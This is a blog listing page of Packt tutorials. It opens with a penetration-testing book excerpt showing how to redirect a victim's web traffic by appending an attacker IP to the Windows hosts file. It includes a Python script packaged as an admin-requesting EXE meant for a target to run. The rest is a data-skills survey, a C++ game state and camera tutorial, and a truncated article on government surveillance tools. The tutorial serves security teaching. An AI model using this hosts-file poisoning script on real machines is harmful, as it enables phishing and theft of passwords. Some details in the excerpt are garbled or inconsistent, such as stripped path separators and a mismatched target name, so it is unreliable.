Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7008 Articles
article-image-phish-for-passwords-using-dns-poisoning
Savia Lobo
14 Jun 2018
6 min read
Save for later

Phish for passwords using DNS poisoning [Tutorial]

Savia Lobo
14 Jun 2018
6 min read
Phishing refers to obtaining sensitive information such as passwords, usernames, or even bank details, and so on. Hackers or attackers lure customers to share their personal details by sending them e-mails which appear to come form popular organizatons.  In this tutorial, you will learn how to implement password phishing using DNS poisoning, a form of computer security hacking. In DNS poisoning, a corrupt Domain Name system data is injected into the DNS resolver's cache. This causes the name server to provide an incorrect result record. Such a method can result into traffic being directed onto hacker's computer system. This article is an excerpt taken from 'Python For Offensive PenTest written by Hussam Khrais.  Password phishing – DNS poisoning One of the easiest ways to manipulate the direction of the traffic remotely is to play with DNS records. Each operating system contains a host file in order to statically map hostnames to specific IP addresses. The host file is a plain text file, which can be easily rewritten as long as we have admin privileges. For now, let's have a quick look at the host file in the Windows operating system. In Windows, the file will be located under C:WindowsSystem32driversetc. Let's have a look at the contents of the host file: If you read the description, you will see that each entry should be located on a separate line. Also, there is a sample of the record format, where the IP should be placed first. Then, after at least one space, the name follows. You will also see that each record's IP address begins first and then we get the hostname. Now, let's see the traffic on the packet level: Open Wireshark on our target machine and start the capture. Filter on the attacker IP address: We have an IP address of 10.10.10.100, which is the IP address of our attacker. We can see the traffic before poisoning the DNS records. You need to click on Apply to complete the process. Open https://www.google.jo/?gws_rd=ssl. Notice that once we ping the name from the command line, the operating system behind the scene will do a DNS lookup: We will get the real IP address. Now, notice what happens after DNS poisoning. For this, close all the windows except the one where the Wireshark application is running. Keep in mind that we should run as admin to be able to modify the host file. Now, even though we are running as an admin, when it comes to running an application you should explicitly do a right-click and then run as admin. Navigate to the directory where the hosts file is located. Execute dir and you will get the hosts file. Run type hosts. You can see the original host here. Now, we will enter the command: echo 10.10.10.100 www.google.jo >> hosts 10.10.100, is the IP address of our Kali machine. So, once the target goes to google.jo, it should be redirected to the attacker machine. Once again verify the host by executing type hosts. Now, after doing a DNS modification, it's always a good thing to flush the DNS cache, just to make sure that we will use the updated record. For this, enter the following command: ipconfig /flushdns Now, watch what happens after DNS poisoning. For this, we will open our browser and navigate to https://www.google.jo/?gws_rd=ssl. Notice that on Wireshark the traffic is going to the Kali IP address instead of the real IP address of google.jo. This is because the DNS resolution for google.jo was 10.10.10.100. We will stop the capturing and recover the original hosts file. We will then place that file in the driversetc folder. Now, let's flush the poisoned DNS cache first by running: ipconfig /flushdns Then, open the browser again. We should go to https://www.google.jo/?gws_rd=ssl right now. Now we are good to go! Using Python script Now we'll automate the steps, but this time via a Python script. Open the script and enter the following code: # Python For Offensive PenTest # DNS_Poisoning import subprocess import os os.chdir("C:WindowsSystem32driversetc") # change the script directory to ..etc where the host file is located on windows command = "echo 10.10.10.100 www.google.jo >> hosts" # Append this line to the host file, where it should redirect # traffic going to google.jo to IP of 10.10.10.100 CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) command = "ipconfig /flushdns" # flush the cached dns, to make sure that new sessions will take the new DNS record CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) The first thing we will do is change our current working directory to be the same as the hosts file, and that will be done using the OS library. Then, using subprocesses, we will append a static DNS record, pointing Facebook to 10.10.10.100: the Kali IP address. In the last step, we will flush the DNS record. We can now save the file and export the script into EXE. Remember that we need to make the target execute it as admin. To do that, in the setup file for the py2exe, we will add a new line, as follows: ... windows = [{'script': "DNS.py", 'uac_info': "requireAdministrator"}], ... So, we have added a new option, specifying that when the target executes the EXE file, we will ask to elevate our privilege into admin. To do this, we will require administrator privileges. Let's run the setup file and start a new capture. Now, I will copy our EXE file onto the desktop. Notice here that we got a little shield indicating that this file needs an admin privilege, which will give us the exact result for running as admin. Now, let's run the file. Verify that the file host gets modified. You will see that our line has been added. Now, open a new session and we will see whether we got the redirection. So, let's start a new capture, and we will add on the Firefox. As you will see, the DNS lookup for google.jo is pointing to our IP address, which is 10.10.10.100. We learned how to carry out password phishing using DNS poisoning. If you've enjoyed reading the post, do check out, Python For Offensive PenTest to learn how to hack passwords and perform a privilege escalation on Windows with practical examples. 12 common malware types you should know Getting started with Digital forensics using Autopsy 5 pen testing rules of engagement: What to consider while performing Penetration testing
Read more
  • 0
  • 0
  • 39769

article-image-data-professionals-planning-to-learn-this-year-python-deep-learning
Amey Varangaonkar
14 Jun 2018
4 min read
Save for later

What are data professionals planning to learn this year? Python, deep learning, yes. But also...

Amey Varangaonkar
14 Jun 2018
4 min read
One thing that every data professional absolutely dreads is the day their skills are no longer relevant in the market. In an ever-changing tech landscape, one must be constantly on the lookout for the most relevant, industrially-accepted tools and frameworks. This is applicable everywhere - from application and web developers to cybersecurity professionals. Not even the data professionals are excluded from this, as new ways and means to extract actionable insights from raw data are being found out almost every day. Gone are the days when data pros stuck to a single language and a framework to work with their data. Frameworks are more flexible now, with multiple dependencies across various tools and languages. Not just that, new domains are being identified where these frameworks can be applied, and how they can be applied varies massively as well. A whole new arena of possibilities has opened up, and with that new set of skills and toolkits to work on these domains have also been unlocked. What’s the next big thing for data professionals? We recently polled thousands of data professionals as part of our Skill-Up program, and got some very interesting insights into what they think the future of data science looks like. We asked them what they were planning to learn in the next 12 months. The following word cloud is the result of their responses, weighted by frequency of the tools they chose: What data professionals are planning on learning in the next 12 months Unsurprisingly, Python comes out on top as the language many data pros want to learn in the coming months. With its general-purpose nature and innumerable applications across various use-cases, Python’s sky-rocketing popularity is the reason everybody wants to learn it. Machine learning and AI are finding significant applications in the web development domain today. They are revolutionizing the customers’ digital experience through conversational UIs or chatbots. Not just that, smart machine learning algorithms are being used to personalize websites and their UX. With all these reasons, who wouldn’t want to learn JavaScript, as an important tool to have in their data science toolkit? Add to that the trending web dev framework Angular, and you have all the tools to build smart, responsive front-end web applications. We also saw data professionals taking active interest in the mobile and cloud domains as well. They aim to learn Kotlin and combine its power with the data science tools for developing smarter and more intelligent Android apps. When it comes to the cloud, Microsoft’s Azure platform has introduced many built-in machine learning capabilities, as well as a workbench for data scientists to develop effective, enterprise-grade models. Data professionals also prefer Docker containers to run their applications seamlessly, and hence its learning need seems to be quite high. [box type="shadow" align="" class="" width=""]Has machine learning with JavaScript caught your interest? Don’t worry, we got you covered - check out Hands-on Machine Learning with JavaScript for a practical, hands-on coverage of the essential machine learning concepts using the leading web development language. [/box] With Crypto’s popularity off the roof (sadly, we can’t say the same about Bitcoin’s price), data pros see Blockchain as a valuable skill. Building secure, decentralized apps is on the agenda for many, perhaps. Cloud, Big Data, Artificial Intelligence are some of the other domains that the data pros find interesting, and feel worth skilling up in. Work-related skills that data pros want to learn We also asked the data professionals what skills the data pros wanted to learn in the near future that could help them with their daily jobs more effectively. The following word cloud of their responses paints a pretty clear picture: Valuable skills data professionals want to learn for their everyday work As Machine learning and AI go mainstream, so do their applications in mainstream domains - often resulting in complex problems. Well, there’s deep learning and specifically neural networks to tackle these problems, and these are exactly the skills data pros want to master in order to excel at their work. [box type="shadow" align="" class="" width=""]Data pros want to learn Machine Learning in Python. Do you? Here’s a useful resource for you to get started - check out Python Machine Learning, Second Edition today![/box] So, there it is! What are the tools, languages or frameworks that you are planning to learn in the coming months? Do you agree with the results of the poll? Do let us know. What are web developers favorite front-end tools? Packt’s Skill Up report reveals all Data cleaning is the worst part of data analysis, say data scientists 15 Useful Python Libraries to make your Data Science tasks Easier
Read more
  • 0
  • 0
  • 42899

article-image-building-c-game-play-engines-in-finite-state-machine-pattern
Amarabha Banerjee
14 Jun 2018
20 min read
Save for later

Building C++ game play engines in finite state machine pattern [Tutorial]

Amarabha Banerjee
14 Jun 2018
20 min read
One of the most important aspect of game development is creating game states which helps in different tasks like controlling game flows, managing different game windows and so on. Here in this article, we are going to show you how you can create game play systems with C++ which will help you to manage game states and empower you to control different game functionalities efficiently. We use game states in many different ways. For example to control the game flow, handle the different ways characters can act and react, even for simple menu navigation. Needless to say, states are an important requirement for a strong and manageable code base. There are many different types of states machines; the one we will focus in this section is the Finite State Machine (FSM) pattern. We will be creating an FSM pattern that will help you to create a more generic and flexible state machine. This article is taken from the book Mastering C++ game Development written by Mickey Macdonald. This book shows you how you can create interesting and fun filled games with C++. There are a few ways we can implement a simple state machine in our game. One way would be to simply use a switch case set up to control the states and an enum structure for the state types. An example of this would be as follows: enum PlayerState { Idle, Walking } ... PlayerState currentState = PlayerState::Idle; //A holder variable for the state currently in ... // A simple function to change states void ChangeState(PlayState nextState) { currentState = nextState; } void Update(float deltaTime) { ... switch(currentState) { case PlayerState::Idle: ... //Do idle stuff //Change to next state ChangeState(PlayerState::Walking); break; case PlayerState::Walking: ... //Do walking stuff //Change to next state ChangeState(PlayerState::Idle); break; } ... } Using a switch/case like this can be effective for a lot of situations, but it does have some strong drawbacks. What if we decide to add a few more states? What if we decide to add branching and more if conditionals? The simple switch/case we started out with has suddenly become very large and undoubtedly unwieldy. Every time we want to make a change or add some functionality, we multiply the complexity and introduce more chances for bugs to creep in. We can help mitigate some of these issues and provide more flexibility by taking a slightly different approach and using classes to represent our states. Through the use of inheritance and polymorphism, we can build a structure that will allow us to chain together states and provide the flexibility to reuse them in many situations. Let's walk through how we can implement this in our demo examples, starting with the base class we will inherit from in the future, IState: ... namespace BookEngine { class IState { public: IState() {} virtual ~IState(){} // Called when a state enters and exits virtual void OnEntry() = 0; virtual void OnExit() = 0; // Called in the main game loop virtual void Update(float deltaTime) = 0; }; } As you can see, this is just a very simple class that has a constructor, a virtual destructor, and three completely virtual functions that each inherited state must override. OnEntry, which will be called as the state is first entered, will only execute once per state change. OnExit, like OnEntry, will only be executed once per state change and is called when the state is about to be exited. The last function is the Update function; this will be called once per game loop and will contain much of the state's logic. Although this seems very simple, it gives us a great starting point to build more complex states. Now let's implement this basic IState class in our examples and see how we can use it for one of the common needs of a state machine: creating game states. First, we will create a new class called GameState that will inherit from IState. This will be the new base class for all the states our game will need. The GameState.h file consists of the following: #pragma once #include <BookEngineIState.h> class GameState : BookEngine::IState { public: GameState(); ~GameState(); //Our overrides virtual void OnEntry() = 0; virtual void OnExit() = 0; virtual void Update(float deltaTime) = 0; //Added specialty function virtual void Draw() = 0; }; The GameState class is very much like the IState class it inherits from, except for one key difference. In this class, we add a new virtual method Draw() that all classes will now inherit from GameState will be implemented. Each time we use IState and create a new specialized base class, player state, menu state, and so on, we can add these new functions to customize it to the requirements of the state machine. This is how we use inheritance and polymorphism to create more complex states and state machines. Continuing with our example, let's now create a new GameState. We start by creating a new class called GameWaiting that inherits from GameState. To make it a little easier to follow, I have grouped all of the new GameState inherited classes into one set of files GameStates.h and GameStates.cpp. The GamStates.h file will look like the following: #pragma once #include "GameState.h" class GameWaiting: GameState { virtual void OnEntry() override; virtual void OnExit() override; virtual void Update(float deltaTime) override; virtual void Draw() override; }; class GameRunning: GameState { virtual void OnEntry() override; virtual void OnExit() override; virtual void Update(float deltaTime) override; virtual void Draw() override; }; class GameOver : GameState { virtual void OnEntry() override; virtual void OnExit() override; virtual void Update(float deltaTime) override; virtual void Draw() override; }; Nothing new here; we are just declaring the functions for each of our GameState classes. Now, in our GameStates.cpp file, we can implement each individual state's functions as described in the preceding code: #include "GameStates.h" void GameWaiting::OnEntry() { ... //Called when entering the GameWaiting state's OnEntry function ... } void GameWaiting::OnExit() { ... //Called when entering the GameWaiting state's OnEntry function ... } void GameWaiting::Update(float deltaTime) { ... //Called when entering the GameWaiting state's OnEntry function ... } void GameWaiting::Draw() { ... //Called when entering the GameWaiting state's OnEntry function ... } ... //Other GameState implementations ... For the sake of page space, I am only showing the GameWaiting implementation, but the same goes for the other states. Each one will have its own unique implementation of these functions, which allows you to control the code flow and implement more states as necessary without creating a hard-to-follow maze of code paths. Now that we have our states defined, we can implement them in our game. Of course, we could go about this in many different ways. We could follow the same pattern that we did with our screen system and implement a GameState list class, a definition of which could look like the following: class GameState; class GameStateList { public: GameStateList (IGame* game); ~ GameStateList (); GameState* GoToNext(); GameState * GoToPrevious(); void SetCurrentState(int nextState); void AddState(GameState * newState); void Destroy(); GameState* GetCurrent(); protected: IGame* m_game = nullptr; std::vector< GameState*> m_states; int m_currentStateIndex = -1; }; } Or we could simply use the GameState classes we created with a simple enum and a switch case. The use of the state pattern allows for this flexibility. Working with cameras At this point, we have discussed a good amount about the structure of systems and have now been able to move on to designing ways of interacting with our game and 3D environment. This brings us to an important topic: the design of virtual camera systems. A camera is what provides us with a visual representation of our 3D world. It is how we immerse ourselves and it provides us with feedback on our chosen interactions. In this section, we are going to cover the concept of a virtual camera in computer graphics. Before we dive into writing the code for our camera, it is important to have a strong understanding of how, exactly, it all works. Let's start with the idea of being able to navigate around the 3D world. In order to do this, we need to use what is referred to as a transformation pipeline. A transformation pipeline can be thought of as the steps that are taken to transform all objects and points relative to the position and orientation of a camera viewpoint. The following is a simple diagram that details the flow of a transformation pipeline: Beginning with the first step in the pipeline, local space, when a mesh is created it has a local origin 0 x, 0 y, 0 z. This local origin is typically located in either the center of the object or in the case of some player characters, the center of the feet. All points that make up that mesh are then based on that local origin. When talking about a mesh that has not been transformed, we refer to it as being in local space: The preceding image pictures the gnome mesh in a model editor. This is what we would consider local space. In the next step, we want to bring a mesh into our environment, the world space. In order to do this, we have to multiply our mesh points by what is referred to as a model matrix. This will then place the mesh in world space, which sets all the mesh points to be relative to a single world origin. It's easiest to think of world space as being the description of the layout of all the objects that make up your game's environment. Once meshes have been placed in world space, we can start to do things such as compare distances and angles. A great example of this step is when placing game objects in a world/level editor; this is creating a description of the model's mesh in relation to other objects and a single world origin (0,0,0). We will discuss editors in more detail in the next chapter. Next, in order to navigate this world space, we have to rearrange the points so that they are relative to the camera's position and orientations. To accomplish this, we perform a few simple operations. The first is to translate the objects to the origin. First, we would move the camera from its current world coordinates. In the following example figure, there is 20 on the x axis, 2 on the y axis, and -15 on the z axis, to the world origin or 0,0,0. We can then map the objects by subtracting the camera's position, the values used to translate the camera object, which in this case would be -20, -2, 15. So if our game object started out at 10.5 on the x axis, 1 on the y axis, and -20 on the z axis, the newly translated coordinates would be -9.5, -1, -5. The last operation is to rotate the camera to face the desired direction; in our current case, that would be pointing down the -z axis. For the following example, that would mean rotating the object points by -90 degrees, making the example game object's new position 5, -1, -9.5. These operations combine into what is referred to as the view matrix: Before we go any further, I want to briefly cover some important details when it comes to working with matrices, in particular, handling matrix multiplication and the order of operations. When working with OpenGL, all matrices are defined in a column-major layout. The opposite being row-major layout, found in other graphics libraries such as Microsoft's DirectX. The following is the layout for column-major view matrices, where U is the unit vector pointing up, F is our vector pointing forward, R is the right vector, and P is the position of the camera: When constructing a matrix with a combination of translations and rotations, such as the preceding view matrix, you cannot, generally, just stick the rotation and translation values into a single matrix. In order to create a proper view matrix, we need to use matrix multiplication to combine two or more matrices into a single final matrix. Remembering that we are working with column-major notations, the order of the operations is therefore right to left. This is important since, using the orientation (R) and translation (T) matrices, if we say V = T x R, this would produce an undesired effect because this would first rotate the points around the world origin and then move them to align to the camera position as the origin. What we want is V = R x T, where the points would first align to the camera as the origin and then apply the rotation. In a row-major layout, this is the other way around of course: The good news is that we do not necessarily need to handle the creation of the view matrix manually. Older versions of OpenGL and most modern math libraries, including GLM, have an implementation of a lookAt() function. Most take a version of camera position, target or look position, and the up direction as parameters, and return a fully created view matrix. We will be looking at how to use the GLM implementation of the lookAt() function shortly, but if you want to see the full code implementation of the ideas described just now, check out the source code of GLM which is included in the project source repository. Continuing through the transformation pipeline, the next step is to convert from eye space to homogeneous clip space. This stage will construct a projection matrix. The projection matrix is responsible for a few things. First is to define the near and far clipping planes. This is the visible range along the defined forward axis (usually z). Anything that falls in front of the near distance and anything that falls past the far distance is considered out of range. Any geometrical objects that are on the outside of this range will be clipped (removed) from the pipeline in a later step. Second is to define the Field of View (FOV). Despite the name, the field of view is not a field but an angle. For the FOV, we actually only specify the vertical range; most modern games use 66 or 67 degrees for this. The horizontal range will be calculated for us by the matrix once we provide the aspect ratio (how wide compared to how high). To demonstrate, a 67 degree vertical angle on a display with a 4:3 aspect ratio would have a FOV of 89.33 degrees (67 * 4/3 = 89.33). These two steps combine to create a volume that takes the shape of a pyramid with the top chopped off. This created volume is referred to as the view frustum. Any of the geometry that falls outside of this frustum is considered to be out of view. The following diagram illustrates what the view frustum looks like: You might note that there is more visible space available at the end of the frustum than in the front. In order to properly display this on a 2D screen, we need to tell the hardware how to calculate the perspective. This is the next step in the pipeline. The larger, far end of the frustum will be pushed together creating a box shape. The collection of objects visible at this wide end will also be squeezed together; this will provide us with a perspective view. To understand this, imagine the phenomenon of looking along a straight stretch of railway tracks. As the tracks continue into the distance, they appear to get smaller and closer together. The next step in the pipeline, after defining the clipping space, is to use what is called the perspective division to normalize the points into a box shape with the dimensions of (-1 to 1, -1 to 1, -1 to 1). This is referred to as the normalized device space. By normalizing the dimensions into unit size, we allow the points to be multiplied to scale up or down to any viewport dimensions. The last major step in the transformation pipeline is to create the 2D representation of the 3D that will be displayed. To do this, we flatten the normalized device space with the objects further away being drawn behind the objects that are closer to the camera (draw depth). The dimensions are scaled from the X and Y normalized values into actual pixel values of the viewport. After this step, we have a 2D space referred to as the Viewport space. That completes the transformation pipeline stages. With that theory covered, we can now shift to implementation and write some code. We are going to start by looking at the creation of a basic, first person 3D camera, which means we are looking through the eyes of the player's character. Let's start with the camera's header file, Camera3D.h in the source code repository: ... #include <glm/glm.hpp> #include <glm/gtc/matrix_transform.hpp> ..., We start with the necessary includes. As I just mentioned, GLM includes support for working with matrices, so we include both glm.hpp and the matrix_transform.hpp to gain access to GLM's lookAt() function: ... public: Camera3D(); ~Camera3D(); void Init(glm::vec3 cameraPosition = glm::vec3(4,10,10), float horizontalAngle = -2.0f, float verticalAngle = 0.0f, float initialFoV = 45.0f); void Update(); Next, we have the public accessible functions for our Camera3D class. The first two are just the standard constructor and destructor. We then have the Init() function. We declare this function with a few defaults provided for the parameters; this way if no values are passed in, we will still have values to calculate our matrices in the first update call. That brings us to the next function declared, the Update() function. This is the function that the game engine will call each loop to keep the camera updated: glm::mat4 GetView() { return m_view; }; glm::mat4 GetProjection() { return m_projection; }; glm::vec3 GetForward() { return m_forward; }; glm::vec3 GetRight() { return m_right; }; glm::vec3 GetUp() { return m_up; }; After the Update() function, there is a set of five getter functions to return both the View and Projection matrices, as well as the camera's forward, up, and right vectors. To keep the implementation clean and tidy, we can simply declare and implement these getter functions right in the header file: void SetHorizontalAngle(float angle) { m_horizontalAngle = angle; }; void SetVerticalAngle(float angle) { m_verticalAngle = angle; }; Directly after the set of getter functions, we have two setter functions. The first will set the horizontal angle, the second will set the vertical angle. This is useful for when the screen size or aspect ratio changes: void MoveCamera(glm::vec3 movementVector) { m_position += movementVector; }; The last public function in the Camera3D class is the MoveCamera() function. This simple function takes in a vector 3, then cumulatively adds that vector to the m_position variable, which is the current camera position: ... private: glm::mat4 m_projection; glm::mat4 m_view; // Camera matrix For the private declarations of the class, we start with two glm::mat4 variables. A glm::mat4 is the datatype for a 4x4 matrix. We create one for the view or camera matrix and one for the projection matrix: glm::vec3 m_position; float m_horizontalAngle; float m_verticalAngle; float m_initialFoV; Next, we have a single vector 3 variable to hold the position of the camera, followed by three float values—one for the horizontal and one for the vertical angles, as well as a variable to hold the field of view: glm::vec3 m_right; glm::vec3 m_up; glm::vec3 m_forward; We then have three more vector 3 variable types that will hold the right, up, and forward values for the camera object. Now that we have the declarations for our 3D camera class, the next step is to implement any of the functions that have not already been implemented in the header file. There are only two functions that we need to provide, the Init() and the Update() functions. Let's begin with the Init() function, found in the Camera3D.cpp file: void Camera3D::Init(glm::vec3 cameraPosition, float horizontalAngle, float verticalAngle, float initialFoV) { m_position = cameraPosition; m_horizontalAngle = horizontalAngle; m_verticalAngle = verticalAngle; m_initialFoV = initialFoV; Update(); } ... Our Init() function is straightforward; all we are doing in the function is taking in the provided values and setting them to the corresponding variable we declared. Once we have set these values, we simply call the Update() function to handle the calculations for the newly created camera object: ... void Camera3D::Update() { m_forward = glm::vec3( glm::cos(m_verticalAngle) * glm::sin(m_horizontalAngle), glm::sin(m_verticalAngle), glm::cos(m_verticalAngle) * glm::cos(m_horizontalAngle) ); The Update() function is where all of the heavy lifting of the classes is done. It starts out by calculating the new forward for our camera. This is done with a simple formula leveraging GLM's cosine and sine functions. What is occurring is that we are converting from spherical coordinates to cartesian coordinates so that we can use the value in the creation of our view matrix. m_right = glm::vec3( glm::sin(m_horizontalAngle - 3.14f / 2.0f), 0, glm::cos(m_horizontalAngle - 3.14f / 2.0f) ); After we calculate the new forward, we then calculate the new right vector for our camera, again using a simple formula that leverages GLM's sine and cosine functions: m_up = glm::cross(m_right, m_forward); Now that we have the forward and up vectors calculated, we can use GLM's cross-product function to calculate the new up vector for our camera. It is important that these three steps happen every time the camera changes position or rotation, and before the creation of the camera's view matrix: float FoV = m_initialFoV; Next, we specify the FOV. Currently, I am just setting it back to the initial FOV specified when initializing the camera object. This would be the place to recalculate the FOV if the camera was, say, zoomed in or out (hint: mouse scroll could be useful here): m_projection = glm::perspective(glm::radians(FoV), 4.0f / 3.0f, 0.1f, 100.0f); Once we have the field of view specified, we can then calculate the projection matrix for our camera. Luckily for us, GLM has a very handy function called glm::perspective(), which takes in a field of view in radians, an aspect ratio, the near clipping distance, and a far clipping distance, which will then return a created projection matrix for us. Since this is an example, I have specified a 4:3 aspect ratio (4.0f/3.0f) and a clipping space of 0.1 units to 100 units directly. In production, you would ideally move these values to variables that could be changed during runtime: m_view = glm::lookAt( m_position, m_position + m_forward, m_up ); } Finally, the last thing we do in the Update() function is to create the view matrix. As I mentioned before, we are fortunate that the GLM library supplies a lookAt() function to abstract all the steps we discussed earlier in the section. This lookAt() function takes three parameters. The first is the position of the camera. The second is a vector value of where the camera is pointed, or looking at, which we provide by doing a simple addition of the camera's current position and it's calculated forward. The last parameter is the camera's current up vector which, again, we calculated previously. Once finished, this function will return the newly updated view matrix to use in our graphics pipeline. We learned to create a simple FSM game engine with C++. Checkout this book Mastering C++ game Development to learn high-end game development with advanced C++ 17 programming techniques. How AI is changing game development How to use arrays, lists, and dictionaries in Unity for 3D game development Unity 2D & 3D game kits simplify Unity game development for beginners
Read more
  • 0
  • 0
  • 48354

article-image-alarming-ways-governments-use-surveillance-tech
Neil Aitken
14 Jun 2018
12 min read
Save for later

Alarming ways governments are using surveillance tech to watch you

Neil Aitken
14 Jun 2018
12 min read
Mapquest, part of the Verizon company, is the second largest provider of mapping services in the world, after Google Maps. It provides advanced cartography services to companies like Snap and PapaJohns pizza. The company is about to release an app that users can install on their smartphone. Their new application will record and transmit video images of what’s happening in front of your vehicle, as you travel. Data can be sent from any phone with a camera – using the most common of tools – a simple mobile data plan, for example. In exchange, you’ll get live traffic updates, among other things. Mapquest will use the video image data they gather to provide more accurate and up to date maps to their partners. The real world is changing all the time – roads get added, cities re-route traffic from time to time. The new AI based technology Mapquest employ could well improve the reliability of driverless cars, which have to engage with this ever changing landscape, in a safe manner. No-one disagrees with safety improvements. Mapquests solution is impressive technology. The fact that they can use AI to interpret the images they see and upload the information they receive to update maps is incredible. And, in this regard, the company is just one of the myriad daily news stories which excite and astound us. These stories do, however, often have another side to them which is rarely acknowledged. In the wrong hands, Mapquest’s solution could create a surveillance database which tracked people in real time. Surveillance technology involves the use of data and information products to capture details about individuals. The act of surveillance is usually undertaken with a view to achieving a goal. The principle is simple. The more ‘they’ know about you, the easier it will be to influence you towards their ends. Surveillance information can be used to find you, apprehend you or potentially, to change your mind, without even realising that you had been watched. Mapquest’s innovation is just a single example of surveillance technology in government hands which has expanded in capability far beyond what most people realise. Read also: What does the US government know about you? The truth beyond the Facebook scandal Facebook’s share price fell 14% in early 2018 as a result of public outcry related to the Cambridge Analytica announcements the company made. The idea that a private company had allowed detailed information about individuals to be provided to a third party without their consent appeared to genuinely shock and appall people. Technology tools like Mapquest’s tracking capabilities and Facebook’s profiling techniques are being taken and used by police forces and corporate entities around the world. The reality of current private and public surveillance capabilities is that facilities exist, and are in use, to collect and analyse data on most people in the developing world. The known limits of these services may surprise even those who are on the cutting edge of technology. There are so many examples from all over the world listed below that will genuinely make you want to consider going off grid! Innovative, Ingenious overlords: US companies have a flare for surveillance The US is the centre for information based technology companies. Much of what they develop is exported as well as used domestically. The police are using human genome matching to track down criminals and can find ‘any family in the country’ There have been 2 recent examples of police arresting a suspect after using human genome databases to investigate crimes. A growing number of private individuals have now used publicly available services such as 23andme to sequence their genome (DNA) either to investigate further their family tree, or to determine the potential of a pre-disposition to the gene based component of a disease. In one example, The Golden State Killer, an ex cop, was arrested 32 years after the last reported rape in a series of 45 (in addition to 12 murders) which occurred between 1976 and 1986. To track him down, police approached sites like 23andme with DNA found at crime scenes, established a family match and then progressed the investigation using conventional means. More than 12 million Americans have now used a genetic sequencing service and it is believed that investigators could find a family match for the DNA of anyone who has committed a crime in America. In simple terms, whether you want it or not, the law enforcement has the DNA of every individual in the country available to them. Domain Awareness Centers (DAC) bring the Truman Show to life The 400,000 Residents of Oakland, California discovered in 2012, that they had been the subject of an undisclosed mass surveillance project, by the local police force, for many years. Feeds from CCTV cameras installed in Oakland’s suburbs were augmented with weather information feeds, social media feeds and extracted email conversations, as well as a variety of other sources. The scheme began at Oakland’s port with Federal funding as part of a national response to the events of 9.11.2001 but was extended to cover the near half million residents of the city. Hundreds of additional video cameras were installed, along with gunshot recognition microphones and some of the other surveillance technologies provided in this article. The police force conducting the surveillance had no policy on what information was recorded or for how long it was kept. Internet connected toys spy on children The FBI has warned Americans that children’s toys connected to the internet ‘could put the privacy and safety of children at risk.' Children’s toy Hello Barbie was specifically admonished for poor privacy controls as part of the FBI’s press release. Internet connected toys could be used to record video of children at any point in the day or, conceivably, to relay a human voice, making it appear to the child that the toy was talking to them. Oracle suggest Google’s Android operating system routinely tracks users’ position even when maps are turned off In Australia, two American companies have been involved in a disagreement about the potential monitoring of Android phones. Oracle accused Google of monitoring users’ location (including altitude), even when mapping software is turned off on the device. The tracking is performed in the background of their phone. In Australia alone, Oracle suggested that Google’s monitoring could involve around 1GB of additional mobile data every month, costing users nearly half a billion dollars a year, collectively. Amazon facial recognition in real time helps US law enforcement services Amazon are providing facial recognition services which take a feed from public video cameras, to a number of US Police Forces. Amazon can match images taken in real time to a database containing ‘millions of faces.’ Are there any state or Federal rules in place to govern police facial recognition? Wired reported that there are ‘more or less none.’ Amazon’s scheme is a trial taking place in Florida. There are at least 2 other companies offering similar schemes in the US to law enforcement services. Big glass microphone can help agencies keep an ear on the ground Project ‘Big Glass Microphone’ uses the vibrations that the movements of cars (among other things) cause in the buried fiber optic telecommunications links. A successful test of the technology has been undertaken on the fiber optic cables which run underground on the Stanford University Campus, to record vehicle movements. Fiber optic links now make up the backbone of much data transport infrastructure - the way your phone and computer connect to the internet. Big glass microphone as it stands is the first step towards ‘invisible’ monitoring of people and their assets. It appears the FBI now have the ability to crack/access any phone Those in the know suggest that Apple’s iPhone is the most secure smart device against government surveillance. In 2016, this was put to the test. The Justice Department came into possession of an iPhone allegedly belonging to one of the San Bernadino shooters and ultimately sued Apple in an attempt to force the company to grant access to it, as part of their investigation. The case was ultimately dropped leading some to speculate that NAND mirroring techniques were used to gain access to the phone without Apple’s assistance, implying that even the most secure phones can now be accessed by authorities. Cornell University’s lie detecting algorithm Groundbreaking work by Cornell University will provide ‘at a distance’ access to information that previously required close personal access to an accused subject. Cornell’s solution interprets feeds from a number of video cameras on subjects and analyses the results to judge their heart rate. They believe the system can be used to determine if someone is lying from behind a screen. University of Southern California can anticipate social unrest with social media feeds Researchers at the University Of Southern California have developed an AI tool to study Social Media posts and determine whether those writing them are likely to cause Social Unrest. The software claims to have identified an association between both the volume of tweets written / the content of those tweets and protests turning physical. They can now offer advice to law enforcement on the likelihood of a protest turning violent so they can be properly prepared based on this information. The UK, an epicenter of AI progress, is not far behind in tracking people The UK has a similarly impressive array of tools at its disposal to watch the people that representatives of the country feels may be required. Given the close levels of cooperation between the UK and US governments, it is likely that many of these UK facilities are shared with the US and other NATO partners. Project stingray – fake cell phone/mobile phone ‘towers’ to intercept communications Stingray is a brand name for an IMSI (the unique identifier on a SIM card) tracker. They ‘spoof’ real towers, presenting themselves as the closest mobile phone tower. This ‘fools’ phones in to connecting to them. The technology has been used to spy on criminals in the UK but it is not just the UK government which use Stingray or its equivalents. The Washington Post reported in June 2018 that a number of domestically compiled intelligence reports suggest that foreign governments acting on US soil, including China and Russia, have been eavesdropping on the Whitehouse, using the same technology. UK developed Spyware is being used by authoritarian regimes Gamma International is a company based in Hampshire UK, which provided the (notably authoritarian) Egyptian government with a facility to install what was effectively spyware delivered with a virus on to computers in their country. Once installed, the software permitted the government to monitor private digital interactions, without the need to engage the phone company or ISP offering those services. Any internet based technology could be tracked, assisting in tracking down individuals who may have negative feelings about the Egyptian government. Individual arrested when his fingerprint was taken from a WhatsApp picture of his hand A Drug Dealer was pictured holding an assortment of pills in the UK two months ago. The image of his hand was used to extract an image of his fingerprint. From that, forensic scientists used by UK police, confirmed that officers had arrested the correct person and associated him with drugs. AI solutions to speed up evidence processing including scanning laptops and phones UK police forces are trying out AI software to speed up processing evidence from digital devices. A dozen departments around the UK are using software, called Cellebrite, which employs AI algorithms to search through data found on devices, including phones and laptops. Cellbrite can recognize images that contain child abuse, accepts feeds from multiple devices to see 